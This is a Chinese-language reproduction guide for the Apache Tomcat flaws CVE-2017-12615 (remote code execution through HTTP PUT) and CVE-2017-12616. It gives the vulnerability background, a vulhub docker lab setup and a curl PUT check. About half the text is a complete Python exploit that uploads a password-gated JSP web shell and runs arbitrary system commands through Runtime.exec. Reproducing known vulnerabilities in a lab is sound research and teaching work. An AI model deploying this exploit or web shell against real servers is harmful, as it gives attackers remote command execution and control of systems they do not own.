CVE-2017-12615漏洞復現附EXP

CVE-2017-12615復現

0x00 漏洞介紹

漏洞編號:

CVE-2017-12615

CVE-2017-12616

漏洞名稱:

CVE-2017-12615-遠程代碼執行漏洞

CVE-2017-12616-信息泄露漏洞

官方評級:

高危

漏洞描述:

CVE-2017-12616：信息泄露漏洞

當Tomcat中啓用了 VirtualDirContext時，攻擊者將能經過發送精心構造的惡意請求，繞過設置的相關安全限制，或是獲取到由VirtualDirContext提供支持資源服務的JSP源代碼，從而形成代碼信息泄露。

CVE-2017-12615：遠程代碼執行漏洞

當 Tomcat運行在Windows操做系統時，且啓用了HTTP PUT請求方法（例如，將 readonly 初始化參數由默認值設置爲 false），攻擊者將有可能可經過精心構造的攻擊請求數據包向服務器上傳包含任意代碼的 JSP 文件，JSP文件中的惡意代碼將能被服務器執行。致使服務器上的數據泄露或獲取服務器權限。

經過以上兩個漏洞可在用戶服務器上執行任意代碼，從而致使數據泄露或獲取服務器權限，存在高安全風險。

漏洞利用條件和方式:

CVE-2017-12615漏洞利用須要在Windows環境，且須要將 readonly 初始化參數由默認值設置爲 false，通過實際測試，Tomcat 7.x版本內web.xml配置文件內默認配置無readonly參數，須要手工添加，默認配置條件下不受此漏洞影響。
CVE-2017-12616漏洞須要在server.xml文件配置VirtualDirContext參數，通過實際測試，Tomcat 7.x版本內默認配置無VirtualDirContext參數，須要手工添加，默認配置條件下不受此漏洞影響。
漏洞影響範圍:

CVE-2017-12616影響範圍：Apache Tomcat 7.0.0 - 7.0.80
CVE-2017-12615影響範圍： Apache Tomcat 7.0.0 - 7.0.79

0x01 環境搭建

使用docker搭建漏洞環境

github地址：
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615

0x02 漏洞驗證

這裏我直接搭建在本地80端口上，linux系統下使用curl直接驗證漏洞。

執行命令
curl -XPUT 127.0.0.1/2.jsp/ --data "test"

漏洞驗證腳本

import requests
import sys
import time

'''
Usage:
    python CVE-2017-12615.py http://127.0.0.1

    shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami


'''

def attack(url):
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers={"User-Agent":user_agent}
    data="""<%
    if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>"""
    try:
        requests.put(url, headers=headers, data=data)

        time.sleep(2)

        verify_response = requests.get(url[:-1], headers=headers)

        if verify_response.status_code == 200:
            print 'success!'
        else :
            print verify_response.status_code

    except :
        "error"

if __name__ == '__main__':
    target_url = sys.argv[1] + '/201712615.jsp/'

    attack(target_url)
    print 'shell: ' + target_url[:-1]